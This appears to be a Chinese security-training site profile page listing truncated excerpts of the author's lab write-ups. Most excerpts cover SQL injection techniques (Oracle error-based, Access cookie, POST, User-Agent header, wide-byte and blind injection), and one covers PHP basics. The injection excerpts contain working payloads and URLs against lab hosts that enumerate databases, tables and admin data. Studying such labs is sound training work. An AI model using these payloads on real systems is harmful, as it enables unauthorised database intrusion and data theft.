Track 实习学员

adm1n

1关注
1粉丝
12文章
返回网站首页

您已发布 12篇文章作品写文章

Oracle注入 — 报错注入

http://o1.lab.aqlab.cn:81/?id=1%27%20and%201%20=ctxsys.drithsx.sn(1,(select%20banner%20from%20sys.v_$version%20where%20rownum=1))--得知是Oracle数据库,先查询数据库表,表名为admin,将admin表排除,继续查询数据,猜完表名,再猜列名http://o1.lab

 2019-1-27
 0 
 41 

Access注入 — Cookie注入

提示得知,这是cookie注入的题,cookie注入的方式五花八门,这里我使用的是谷歌浏览器+ ModHeader插件使用cookie进行传参,返回正常,说明cookie可以传参,(cookie传参要URL编码)下面进行注入:猜字段数,字段数为10,猜解表名,默认为adminid=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin暴出输出位,使用联合查

 2019-1-27
 0 
 33 

3.6、POST注入

6.6.1-SQL注入-Post注入Rank 1①分析登录语句 得知传参被单引号包括,尝试绕过,否则sql语句无法执行。 闭合单引号,后面添加注释符注释掉程序给的单引号。添加判断条件,or 1=1Or = “或者”OK,sql语句正常执行,继续注入。②猜字段数 登录成功,字段数为2。③猜解数据库名 无法输出后面的sql语句结果,得让它报错显示。 得

 2019-1-27
 0 
 19 

3.5、HEAD注入

第一题: 得知注入点在User-Agent;①暴出数据库名:' or updatexml(1,concat(0x7e,database(),0x7e),1),1,1)# 得到数据库名:security②暴表名&列名 ' or updatexml(1,concat(0x7e,(select table_name from information_

 2019-1-27
 0 
 67 

3.3、宽字节

①猜解字段数 发现sql语句无法正常执行,出现转意字符,尝试闭合反斜杠转意字符,得知\的URL编码是%5c,在\前面加个%df,%df%5c组合起来就是一个運字,这样sql语句就可以正常执行。 ②查询当前数据库: ③查询表名&列名:  ④查询列的数据:  第二题和一题一样的  第三题:抓包查看数据,发

 2019-1-27
 0 
 26 

后端基础PHP—Php简介及基本函数-上+下+表单验证

==========自己总结的关于PHP的一些知识点==========1,PHP文件是以.PHP结尾;2,一局PHP代码写完,必须使用分号结束;3,echo是输出;(列:echo 'hello world';);4,声明变量要在变量前加$;5,变量不能以数字或特殊字符开头;6,变量严格区分大小写;7,单引号不能解析变量,双引号可以解析变量;8,字符串和变量一起的时候,用.(点)来

 2019-1-27
 0 
 41 

3.2、盲注

第一题:①猜解数据库长度:http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1%27%20and%20(length(database()))=8%20--+②猜解当前数据库名:http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1%27%20and%20(

 2019-1-19
 0 
 20 

3.1、显错注入

①猜解字段数,传参全部被单引号包括,sql语句无法执行,尝试闭合:http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1'%20order%20by%203%20--+得出字段数为四;②联合查询:http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1&

 2018-12-20
 0 
 26